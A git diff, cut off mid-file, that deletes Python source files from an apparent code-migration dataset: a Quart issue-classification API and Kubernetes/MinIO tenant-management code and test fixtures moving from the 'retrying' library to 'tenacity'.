a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py deleted file mode 100644 index 6a295e4..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.target.py +++ /dev/null @@ -1,62 +0,0 @@ -#!usr/bin/env python -# -# Copyright (c) 2019 Intel Corporation -# -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -"""a rest api for github issue classification""" -import quart - -from quart import Quart -from quart_cors import cors - -from infer import infer - - -app = Quart(__name__) -cors(app) - -banner = { - "what": "github issue classifier", - "usage": { - "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' }' http://localhost:5059/github_issues/infer", - "server": "docker run -d -p 5000:5000 stacks_img_recog", - }, -} - - -@app.route("/", methods=["get"]) -@app.route("/index", methods=["get"]) -@app.route("/github_issues", methods=["get"]) -async def index(): - return quart.jsonify(banner), 201 - - -@app.route("/github_issues/infer", methods=["POST"]) -async def pred(): - issue = list() - issue.append(quart.request.json["issue"]) - if not quart.request.json or not "issue" in quart.request.json: - quart.abort(400) - labels = infer(issue) - return quart.jsonify({"label": labels}), 201 - - -@app.errorhandler(404) -async def not_found(error): - return quart.make_response(quart.jsonify({"error": "Not found"}), 404) - - -if __name__ == "__main__": - app.run(host="0.0.0.0", port=5059) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff deleted file mode 100644 index e0bc056..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/management/management_api/tenants/tenants_utils.py b/management/management_api/tenants/tenants_utils.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/management/management_api/tenants/tenants_utils.py - +++ b/management/management_api/tenants/tenants_utils.py -@@ -2,8 +2,7 @@ import falcon - from botocore.exceptions import ClientError - from kubernetes import client - from kubernetes.client.rest import ApiException --from retrying import retry -- -+from tenacity import retry, stop_after_attempt, wait_fixed - from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -@@ -106,7 +105,7 @@ def create_resource_quota(name, quota): - return response - - --@retry(stop_max_attempt_number=5, wait_fixed=2000) -+@retry(stop=stop_after_attempt(5), wait=wait_fixed(2)) - def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True -@@ -126,7 +125,7 @@ def delete_bucket(name): - return response - - --@retry(stop_max_attempt_number=5, wait_fixed=2000) -+@retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py deleted file mode 100644 index d75de19..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.source.py +++ /dev/null @@ -1,256 +0,0 @@ -import falcon -from botocore.exceptions import ClientError -from kubernetes import client -from kubernetes.client.rest import ApiException -from retrying import retry - -from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -from management_api.utils.cert import validate_cert -from management_api.utils.errors_handling import TenantAlreadyExistsException, MinioCallException, \ - TenantDoesNotExistException, KubernetesCreateException, KubernetesDeleteException, \ - KubernetesGetException -from management_api.utils.kubernetes_resources import get_k8s_api_client, get_k8s_rbac_api_client -from management_api.utils.logger import get_logger - -logger = get_logger(__name__) - - -def create_tenant(parameters): - name = parameters['name'] - cert = parameters['cert'] - scope = parameters['scope'] - quota = parameters['quota'] - - logger.info('Creating new tenant: {}' - .format(name, cert, scope, quota)) - - validate_cert(cert) - - if tenant_exists(name): - raise TenantAlreadyExistsException(name) - - try: - create_namespace(name, quota) - propagate_portable_secrets(target_namespace=name) - create_bucket(name) - create_secret(name, cert) - create_resource_quota(name, quota) - create_role(name) - create_rolebinding(name, scope) - except falcon.HTTPError: - delete_namespace(name) - delete_bucket(name) - raise - - logger.info('Tenant {} created'.format(name)) - return name - - -def create_namespace(name, quota): - if 'maxEndpoints' in quota: - name_object = client.\ - V1ObjectMeta(name=name, annotations={'maxEndpoints': str(quota.pop('maxEndpoints'))}) - else: - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespace(namespace) - except ApiException as apiException: - raise KubernetesCreateException('namespace', apiException) - - logger.info("Namespace {} created".format(name)) - return response - - -def create_bucket(name): - try: - response = minio_client.create_bucket(Bucket=name) - except ClientError as clientError: - raise MinioCallException('An error occurred during bucket creation: {}'.format(clientError)) - - logger.info('Bucket created: {}'.format(response)) - return response - - -def create_secret(name, cert): - cert_secret_metadata = client.V1ObjectMeta(name=CERT_SECRET_NAME) - cert_secret_data = {"ca.crt": cert} - cert_secret = client.V1Secret(api_version="v1", data=cert_secret_data, - kind="Secret", metadata=cert_secret_metadata, - type="Opaque") - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_secret(namespace=name, - body=cert_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - logger.info('Secret {} created'.format(CERT_SECRET_NAME)) - return response - - -def create_resource_quota(name, quota): - name_object = client.V1ObjectMeta(name=name) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_resource_quota(name, body) - except ApiException as apiException: - raise KubernetesCreateException('resource_quota', apiException) - - logger.info("Resource quota {} created".format(quota)) - return response - - -@retry(stop_max_attempt_number=5, wait_fixed=2000) -def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True - try: - bucket = minio_resource.Bucket(name) - bucket.objects.all().delete() - response = bucket.delete() - except ClientError as clientError: - if clientError.response['Error']['Code'] != NO_SUCH_BUCKET_EXCEPTION: - raise MinioCallException("A error occurred during bucket deletion: {}" - .format(clientError)) - existed = False - if existed: - logger.info('Bucket {} deleted'.format(name)) - else: - logger.info('Bucket {} does not exist'.format(name)) - return response - - -@retry(stop_max_attempt_number=5, wait_fixed=2000) -def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) - api_instance = get_k8s_api_client() - existed = True - try: - response = api_instance.delete_namespace(name, body) - except ApiException as apiException: - if apiException.status != RESOURCE_DOES_NOT_EXIST and \ - apiException.status != NAMESPACE_BEING_DELETED: - raise KubernetesDeleteException('namespace', apiException) - existed = False - if existed: - logger.info('Namespace {} deleted'.format(name)) - else: - logger.info('Namespace {} does not exist'.format(name)) - - return response - - -def delete_tenant(parameters): - name = parameters['name'] - logger.info('Deleting tenant: {}'.format(name)) - if tenant_exists(name): - delete_bucket(name) - delete_namespace(name) - logger.info('Tenant {} deleted'.format(name)) - else: - raise TenantDoesNotExistException(name) - return name - - -def propagate_secret(source_secret_path, target_namespace): - source_secret_namespace, source_secret_name = source_secret_path.split('/') - api_instance = get_k8s_api_client() - try: - source_secret = api_instance.read_namespaced_secret( - source_secret_name, source_secret_namespace) - except ApiException as apiException: - raise KubernetesGetException('secret', apiException) - - source_secret.metadata.namespace = target_namespace - source_secret.metadata.resource_version = None - - try: - api_instance.create_namespaced_secret(namespace=target_namespace, - body=source_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - -def propagate_portable_secrets(target_namespace): - for portable_secret_path in PORTABLE_SECRETS_PATHS: - propagate_secret(portable_secret_path, target_namespace) - logger.info('Portable secrets copied from default to {}'.format(target_namespace)) - - -def does_bucket_exist(bucket_name): - try: - minio_client.list_objects_v2(Bucket=bucket_name) - except ClientError as clientError: - error_code = clientError.response['Error']['Code'] - if error_code == NO_SUCH_BUCKET_EXCEPTION: - return False - raise MinioCallException("Error accessing bucket: {}".format(clientError)) - return True - - -def is_namespace_available(namespace): - response = None - api_instance = get_k8s_api_client() - try: - response = api_instance.read_namespace_status(namespace) - except ApiException as apiException: - if apiException.status == RESOURCE_DOES_NOT_EXIST: - return False - raise KubernetesGetException('namespace status', apiException) - if response and response.status.phase == TERMINATION_IN_PROGRESS: - return False - return True - - -def tenant_exists(tenant_name): - result = does_bucket_exist(tenant_name) and is_namespace_available(tenant_name) - logger.info("Tenant already exists: " + str(result)) - return result - - -def create_role(name): - api_version = 'rbac.authorization.k8s.io/v1' - meta = client.V1ObjectMeta(name=name, namespace=name) - service_rules = client.V1PolicyRule(api_groups=[""], resources=["services"], - verbs=["create", "list", "get", "delete"]) - ingress_rules = client.V1PolicyRule(api_groups=[""], resources=["ingresses"], - verbs=["create", "list", "get", "delete"]) - deployment_rules = client.V1PolicyRule(api_groups=[""], resources=["deployments"], - verbs=["create", "list", "get", "delete"]) - server_rules = client.V1PolicyRule(api_groups=["aipg.intel.com"], resources=["servers"], - verbs=["create", "get", "delete", "patch"]) - role = client.V1Role(api_version=api_version, metadata=meta, - rules=[service_rules, ingress_rules, deployment_rules, server_rules]) - rbac_api_instance = get_k8s_rbac_api_client() - try: - response = rbac_api_instance.create_namespaced_role(name, role) - except ApiException as apiException: - raise KubernetesCreateException('role', apiException) - - logger.info("Role {} created".format(name)) - return response - - -def create_rolebinding(name, scope_name): - api_version = 'rbac.authorization.k8s.io' - scope = 'oidc:/' + scope_name - subject = client.V1Subject(kind='Group', name=scope, namespace=name) - role_ref = client.V1RoleRef(api_group=api_version, kind='Role', name=name) - meta = client.V1ObjectMeta(name=name, namespace=name) - rolebinding = client.V1RoleBinding(metadata=meta, role_ref=role_ref, subjects=[subject]) - rbac_api_instance = get_k8s_rbac_api_client() - - try: - response = rbac_api_instance.create_namespaced_role_binding(name, rolebinding) - except ApiException as apiException: - KubernetesCreateException('rolebinding', apiException) - - logger.info("Rolebinding {} created".format(name)) - return response diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py deleted file mode 100644 index a6de637..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__management$management_api$tenants$tenants_utils.py.target.py +++ /dev/null @@ -1,255 +0,0 @@ -import falcon -from botocore.exceptions import ClientError -from kubernetes import client -from kubernetes.client.rest import ApiException -from tenacity import retry, stop_after_attempt, wait_fixed -from management_api.config import CERT_SECRET_NAME, PORTABLE_SECRETS_PATHS, \ - minio_client, minio_resource, RESOURCE_DOES_NOT_EXIST, \ - NAMESPACE_BEING_DELETED, NO_SUCH_BUCKET_EXCEPTION, TERMINATION_IN_PROGRESS -from management_api.utils.cert import validate_cert -from management_api.utils.errors_handling import TenantAlreadyExistsException, MinioCallException, \ - TenantDoesNotExistException, KubernetesCreateException, KubernetesDeleteException, \ - KubernetesGetException -from management_api.utils.kubernetes_resources import get_k8s_api_client, get_k8s_rbac_api_client -from management_api.utils.logger import get_logger - -logger = get_logger(__name__) - - -def create_tenant(parameters): - name = parameters['name'] - cert = parameters['cert'] - scope = parameters['scope'] - quota = parameters['quota'] - - logger.info('Creating new tenant: {}' - .format(name, cert, scope, quota)) - - validate_cert(cert) - - if tenant_exists(name): - raise TenantAlreadyExistsException(name) - - try: - create_namespace(name, quota) - propagate_portable_secrets(target_namespace=name) - create_bucket(name) - create_secret(name, cert) - create_resource_quota(name, quota) - create_role(name) - create_rolebinding(name, scope) - except falcon.HTTPError: - delete_namespace(name) - delete_bucket(name) - raise - - logger.info('Tenant {} created'.format(name)) - return name - - -def create_namespace(name, quota): - if 'maxEndpoints' in quota: - name_object = client.\ - V1ObjectMeta(name=name, annotations={'maxEndpoints': str(quota.pop('maxEndpoints'))}) - else: - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespace(namespace) - except ApiException as apiException: - raise KubernetesCreateException('namespace', apiException) - - logger.info("Namespace {} created".format(name)) - return response - - -def create_bucket(name): - try: - response = minio_client.create_bucket(Bucket=name) - except ClientError as clientError: - raise MinioCallException('An error occurred during bucket creation: {}'.format(clientError)) - - logger.info('Bucket created: {}'.format(response)) - return response - - -def create_secret(name, cert): - cert_secret_metadata = client.V1ObjectMeta(name=CERT_SECRET_NAME) - cert_secret_data = {"ca.crt": cert} - cert_secret = client.V1Secret(api_version="v1", data=cert_secret_data, - kind="Secret", metadata=cert_secret_metadata, - type="Opaque") - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_secret(namespace=name, - body=cert_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - logger.info('Secret {} created'.format(CERT_SECRET_NAME)) - return response - - -def create_resource_quota(name, quota): - name_object = client.V1ObjectMeta(name=name) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance = get_k8s_api_client() - try: - response = api_instance.create_namespaced_resource_quota(name, body) - except ApiException as apiException: - raise KubernetesCreateException('resource_quota', apiException) - - logger.info("Resource quota {} created".format(quota)) - return response - - -@retry(stop=stop_after_attempt(5), wait=wait_fixed(2)) -def delete_bucket(name): - response = 'Bucket {} does not exist'.format(name) - existed = True - try: - bucket = minio_resource.Bucket(name) - bucket.objects.all().delete() - response = bucket.delete() - except ClientError as clientError: - if clientError.response['Error']['Code'] != NO_SUCH_BUCKET_EXCEPTION: - raise MinioCallException("A error occurred during bucket deletion: {}" - .format(clientError)) - existed = False - if existed: - logger.info('Bucket {} deleted'.format(name)) - else: - logger.info('Bucket {} does not exist'.format(name)) - return response - - -@retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) -def delete_namespace(name): - body = client.V1DeleteOptions() - response = 'Namespace {} does not exist'.format(name) - api_instance = get_k8s_api_client() - existed = True - try: - response = api_instance.delete_namespace(name, body) - except ApiException as apiException: - if apiException.status != RESOURCE_DOES_NOT_EXIST and \ - apiException.status != NAMESPACE_BEING_DELETED: - raise KubernetesDeleteException('namespace', apiException) - existed = False - if existed: - logger.info('Namespace {} deleted'.format(name)) - else: - logger.info('Namespace {} does not exist'.format(name)) - - return response - - -def delete_tenant(parameters): - name = parameters['name'] - logger.info('Deleting tenant: {}'.format(name)) - if tenant_exists(name): - delete_bucket(name) - delete_namespace(name) - logger.info('Tenant {} deleted'.format(name)) - else: - raise TenantDoesNotExistException(name) - return name - - -def propagate_secret(source_secret_path, target_namespace): - source_secret_namespace, source_secret_name = source_secret_path.split('/') - api_instance = get_k8s_api_client() - try: - source_secret = api_instance.read_namespaced_secret( - source_secret_name, source_secret_namespace) - except ApiException as apiException: - raise KubernetesGetException('secret', apiException) - - source_secret.metadata.namespace = target_namespace - source_secret.metadata.resource_version = None - - try: - api_instance.create_namespaced_secret(namespace=target_namespace, - body=source_secret) - except ApiException as apiException: - raise KubernetesCreateException('secret', apiException) - - -def propagate_portable_secrets(target_namespace): - for portable_secret_path in PORTABLE_SECRETS_PATHS: - propagate_secret(portable_secret_path, target_namespace) - logger.info('Portable secrets copied from default to {}'.format(target_namespace)) - - -def does_bucket_exist(bucket_name): - try: - minio_client.list_objects_v2(Bucket=bucket_name) - except ClientError as clientError: - error_code = clientError.response['Error']['Code'] - if error_code == NO_SUCH_BUCKET_EXCEPTION: - return False - raise MinioCallException("Error accessing bucket: {}".format(clientError)) - return True - - -def is_namespace_available(namespace): - response = None - api_instance = get_k8s_api_client() - try: - response = api_instance.read_namespace_status(namespace) - except ApiException as apiException: - if apiException.status == RESOURCE_DOES_NOT_EXIST: - return False - raise KubernetesGetException('namespace status', apiException) - if response and response.status.phase == TERMINATION_IN_PROGRESS: - return False - return True - - -def tenant_exists(tenant_name): - result = does_bucket_exist(tenant_name) and is_namespace_available(tenant_name) - logger.info("Tenant already exists: " + str(result)) - return result - - -def create_role(name): - api_version = 'rbac.authorization.k8s.io/v1' - meta = client.V1ObjectMeta(name=name, namespace=name) - service_rules = client.V1PolicyRule(api_groups=[""], resources=["services"], - verbs=["create", "list", "get", "delete"]) - ingress_rules = client.V1PolicyRule(api_groups=[""], resources=["ingresses"], - verbs=["create", "list", "get", "delete"]) - deployment_rules = client.V1PolicyRule(api_groups=[""], resources=["deployments"], - verbs=["create", "list", "get", "delete"]) - server_rules = client.V1PolicyRule(api_groups=["aipg.intel.com"], resources=["servers"], - verbs=["create", "get", "delete", "patch"]) - role = client.V1Role(api_version=api_version, metadata=meta, - rules=[service_rules, ingress_rules, deployment_rules, server_rules]) - rbac_api_instance = get_k8s_rbac_api_client() - try: - response = rbac_api_instance.create_namespaced_role(name, role) - except ApiException as apiException: - raise KubernetesCreateException('role', apiException) - - logger.info("Role {} created".format(name)) - return response - - -def create_rolebinding(name, scope_name): - api_version = 'rbac.authorization.k8s.io' - scope = 'oidc:/' + scope_name - subject = client.V1Subject(kind='Group', name=scope, namespace=name) - role_ref = client.V1RoleRef(api_group=api_version, kind='Role', name=name) - meta = client.V1ObjectMeta(name=name, namespace=name) - rolebinding = client.V1RoleBinding(metadata=meta, role_ref=role_ref, subjects=[subject]) - rbac_api_instance = get_k8s_rbac_api_client() - - try: - response = rbac_api_instance.create_namespaced_role_binding(name, rolebinding) - except ApiException as apiException: - KubernetesCreateException('rolebinding', apiException) - - logger.info("Rolebinding {} created".format(name)) - return response diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff deleted file mode 100644 index 54d7dc4..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.diff +++ /dev/null @@ -1,22 +0,0 @@ -diff --git a/tests/conftest.py b/tests/conftest.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/conftest.py - +++ b/tests/conftest.py -@@ -1,7 +1,7 @@ - import boto3 - import pytest - import requests --from retrying import retry -+from tenacity import retry, stop_after_attempt, wait_fixed - from bs4 import BeautifulSoup - from botocore.client import Config - from kubernetes import config, client -@@ -117,7 +117,7 @@ def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - return namespace, body - - --@retry(stop_max_attempt_number=3, wait_fixed=200) -+@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.2)) - def get_all_pods_in_namespace(k8s_client, namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py deleted file mode 100644 index 37fa655..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.source.py +++ /dev/null @@ -1,199 +0,0 @@ -import boto3 -import pytest -import requests -from retrying import retry -from bs4 import BeautifulSoup -from botocore.client import Config -from kubernetes import config, client -from kubernetes.client.rest import ApiException -from urllib.parse import urljoin, urlparse, parse_qs - -from management_api_tests.config import MINIO_SECRET_ACCESS_KEY, MINIO_ACCESS_KEY_ID, \ - MINIO_REGION, MINIO_ENDPOINT_ADDR, SIGNATURE_VERSION, CRD_VERSION, CRD_PLURAL, CRD_KIND, \ - CRD_GROUP, CRD_API_VERSION, TENANT_NAME, TENANT_RESOURCES, ENDPOINT_RESOURCES, \ - AUTH_MANAGEMENT_API_URL, JANE -from management_api_tests.context import Context -from management_api_tests.reused import propagate_portable_secrets, transform_quota - - -@pytest.fixture(scope="session") -def configuration(): - return config.load_kube_config() - - -@pytest.fixture(scope="session") -def api_instance(configuration): - return client.CoreV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def rbac_api_instance(configuration): - return client.RbacAuthorizationV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def apps_api_instance(configuration): - return client.AppsV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def get_k8s_custom_obj_client(configuration): - return client.CustomObjectsApi(client.ApiClient(configuration)) - - -@pytest.fixture(scope="function") -def auth_code_for_jane(): - response = requests.get(AUTH_MANAGEMENT_API_URL, allow_redirects=False) - auth_dex_url = response.headers['location'] - parsed_url = urlparse(auth_dex_url) - dex_base_url = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_url) - - resp = requests.get(auth_dex_url, verify=False) - soup = BeautifulSoup(resp.text, 'html.parser') - login_form_action = urljoin(dex_base_url, soup.form['action']) - - data = JANE - resp = requests.post(login_form_action, data=data, allow_redirects=False, verify=False) - - resp = requests.get(urljoin(dex_base_url, resp.headers['Location']), allow_redirects=False, - verify=False) - query = urlparse(resp.headers['Location']).query - auth_code = parse_qs(query)['code'][0] - - return auth_code - - -@pytest.fixture(scope="function") -def function_context(request, get_k8s_custom_obj_client, api_instance, minio_resource, - minio_client): - context = Context(k8s_client=api_instance, k8s_client_custom=get_k8s_custom_obj_client, - minio_resource_client=minio_resource, minio_client=minio_client) - request.addfinalizer(context.delete_all_objects) - return context - - -@pytest.fixture(scope="session") -def minio_client(): - return boto3.client('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="session") -def minio_resource(): - return boto3.resource('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="function") -def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - namespace, _ = tenant - metadata = {"name": "predict"} - resources = transform_quota(ENDPOINT_RESOURCES) - model_name, model_version = 'resnet', 1 - spec = { - 'modelName': model_name, - 'modelVersion': model_version, - 'endpointName': 'predict', - 'subjectName': 'client', - 'replicas': 1, - 'resources': resources - } - body = {"spec": spec, 'kind': CRD_KIND, "replicas": 1, - "apiVersion": CRD_API_VERSION, "metadata": metadata} - get_k8s_custom_obj_client. \ - create_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, body) - object_to_delete = {'name': "predict", 'namespace': namespace} - function_context.add_object(object_type='CRD', object_to_delete=object_to_delete) - return namespace, body - - -@retry(stop_max_attempt_number=3, wait_fixed=200) -def get_all_pods_in_namespace(k8s_client, namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as e: - print("Exception when calling CoreV1Api->list_pod_for_all_namespaces: %s\n" % e) - - return api_response - - -def resource_quota(api_instance, quota={}, namespace=TENANT_NAME): - name_object = client.V1ObjectMeta(name=namespace) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance.create_namespaced_resource_quota(namespace=namespace, body=body) - return quota - - -@pytest.fixture(scope="function") -def tenant(api_instance, minio_client, function_context): - name = TENANT_NAME - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance.create_namespace(namespace) - propagate_portable_secrets(api_instance, name) - quota = resource_quota(api_instance, quota=TENANT_RESOURCES) - minio_client.create_bucket(Bucket=name) - function_context.add_object(object_type='tenant', object_to_delete={'name': name}) - return name, quota - - -@pytest.fixture(scope="session") -def fake_tenant(): - name = "andrzej" # USER1_HEADERS contain token for andrzej user with scope andrzej - quota = {} - return name, quota - - -@pytest.fixture(scope="function") -def empty_tenant(tenant): - return create_dummy_tenant(tenant) - - -@pytest.fixture(scope="function") -def fake_tenant_endpoint(fake_tenant): - return create_dummy_tenant(fake_tenant) - - -def create_dummy_tenant(tenant): - name, _ = tenant - body = {} - return name, body - - -@pytest.fixture(scope="function") -def fake_endpoint(tenant): - namespace, _ = tenant - model_name, model_version = 'fake', 1 - body = {'spec': {'modelName': model_name, - 'modelVersion': model_version}} - return namespace, body - - -def create_empty_model(endpoint, minio_client): - namespace, body = endpoint - model_name, model_version = body['spec']['modelName'], body['spec']['modelVersion'] - model_path = f'{model_name}-{model_version}/' - minio_client.put_object(Bucket=namespace, Body='', Key=model_path) - return namespace, body - - -@pytest.fixture(scope="function") -def endpoint_with_empty_model(tenant_with_endpoint, minio_client): - return create_empty_model(tenant_with_endpoint, minio_client) - - -@pytest.fixture(scope="function") -def fake_endpoint_with_empty_model(fake_endpoint, minio_client): - return create_empty_model(fake_endpoint, minio_client) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py deleted file mode 100644 index 903370c..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$conftest.py.target.py +++ /dev/null @@ -1,199 +0,0 @@ -import boto3 -import pytest -import requests -from tenacity import retry, stop_after_attempt, wait_fixed -from bs4 import BeautifulSoup -from botocore.client import Config -from kubernetes import config, client -from kubernetes.client.rest import ApiException -from urllib.parse import urljoin, urlparse, parse_qs - -from management_api_tests.config import MINIO_SECRET_ACCESS_KEY, MINIO_ACCESS_KEY_ID, \ - MINIO_REGION, MINIO_ENDPOINT_ADDR, SIGNATURE_VERSION, CRD_VERSION, CRD_PLURAL, CRD_KIND, \ - CRD_GROUP, CRD_API_VERSION, TENANT_NAME, TENANT_RESOURCES, ENDPOINT_RESOURCES, \ - AUTH_MANAGEMENT_API_URL, JANE -from management_api_tests.context import Context -from management_api_tests.reused import propagate_portable_secrets, transform_quota - - -@pytest.fixture(scope="session") -def configuration(): - return config.load_kube_config() - - -@pytest.fixture(scope="session") -def api_instance(configuration): - return client.CoreV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def rbac_api_instance(configuration): - return client.RbacAuthorizationV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def apps_api_instance(configuration): - return client.AppsV1Api(client.ApiClient(configuration)) - - -@pytest.fixture(scope="session") -def get_k8s_custom_obj_client(configuration): - return client.CustomObjectsApi(client.ApiClient(configuration)) - - -@pytest.fixture(scope="function") -def auth_code_for_jane(): - response = requests.get(AUTH_MANAGEMENT_API_URL, allow_redirects=False) - auth_dex_url = response.headers['location'] - parsed_url = urlparse(auth_dex_url) - dex_base_url = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_url) - - resp = requests.get(auth_dex_url, verify=False) - soup = BeautifulSoup(resp.text, 'html.parser') - login_form_action = urljoin(dex_base_url, soup.form['action']) - - data = JANE - resp = requests.post(login_form_action, data=data, allow_redirects=False, verify=False) - - resp = requests.get(urljoin(dex_base_url, resp.headers['Location']), allow_redirects=False, - verify=False) - query = urlparse(resp.headers['Location']).query - auth_code = parse_qs(query)['code'][0] - - return auth_code - - -@pytest.fixture(scope="function") -def function_context(request, get_k8s_custom_obj_client, api_instance, minio_resource, - minio_client): - context = Context(k8s_client=api_instance, k8s_client_custom=get_k8s_custom_obj_client, - minio_resource_client=minio_resource, minio_client=minio_client) - request.addfinalizer(context.delete_all_objects) - return context - - -@pytest.fixture(scope="session") -def minio_client(): - return boto3.client('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="session") -def minio_resource(): - return boto3.resource('s3', - endpoint_url=MINIO_ENDPOINT_ADDR, - aws_access_key_id=MINIO_ACCESS_KEY_ID, - aws_secret_access_key=MINIO_SECRET_ACCESS_KEY, - config=Config( - signature_version=SIGNATURE_VERSION), - region_name=MINIO_REGION) - - -@pytest.fixture(scope="function") -def tenant_with_endpoint(function_context, tenant, get_k8s_custom_obj_client): - namespace, _ = tenant - metadata = {"name": "predict"} - resources = transform_quota(ENDPOINT_RESOURCES) - model_name, model_version = 'resnet', 1 - spec = { - 'modelName': model_name, - 'modelVersion': model_version, - 'endpointName': 'predict', - 'subjectName': 'client', - 'replicas': 1, - 'resources': resources - } - body = {"spec": spec, 'kind': CRD_KIND, "replicas": 1, - "apiVersion": CRD_API_VERSION, "metadata": metadata} - get_k8s_custom_obj_client. \ - create_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, body) - object_to_delete = {'name': "predict", 'namespace': namespace} - function_context.add_object(object_type='CRD', object_to_delete=object_to_delete) - return namespace, body - - -@retry(stop=stop_after_attempt(3), wait=wait_fixed(0.2)) -def get_all_pods_in_namespace(k8s_client, 